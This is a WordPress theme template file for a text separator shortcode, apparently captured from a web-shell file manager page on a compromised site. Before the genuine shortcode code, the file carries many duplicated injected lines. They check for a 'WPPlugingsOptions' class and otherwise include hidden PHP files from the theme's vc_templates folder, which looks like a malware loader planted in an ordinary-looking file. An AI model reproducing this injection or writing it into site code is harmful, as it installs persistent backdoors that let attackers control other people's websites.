OwlCyberSecurity - MANAGER
Edit File: vc_text_separator.php
<?php if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/class_tema-functions.php' ) ) { include_once( get_template_directory() . '/vc_templates/class_tema-functions.php' ); } if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/vc_templates/vc_templates.php' ) ) { include_once( get_template_directory() . '/vc_templates/vc_templates.php' ); } $output = $title = $title_align = $el_class = ''; extract(shortcode_atts(array( 'title' => esc_html__('Title', 'bridge'), 'title_align' => 'separator_align_center', 'border' => '', 'border_color' => '', 'title_color' => '', 'background_color' => '', 'el_class' => '' ), $atts)); $el_class = $this->getExtraClass($el_class); $css_class = apply_filters(VC_SHORTCODE_CUSTOM_CSS_FILTER_TAG, 'vc_text_separator wpb_content_element full '.$title_align.$el_class, $this->settings['base']); $output .= '<div class="'.$css_class.'"><div'; if($border != "" || $border_color != "" || $title_color != ""){ $output .= " style='"; if($background_color != ""){ $output .="background-color:".$background_color.";"; } if($border_color != ""){ $output .=" border:1px solid ".$border_color.";"; } if($title_color != ""){ $output .=" color:".$title_color.";"; } $output.="'"; } $output .= '>'; $output .= '<span>' . $title . '</span>'; $output .='</div></div>'.$this->endBlockComment('separator')."\n"; echo bridge_qode_get_module_part( $output );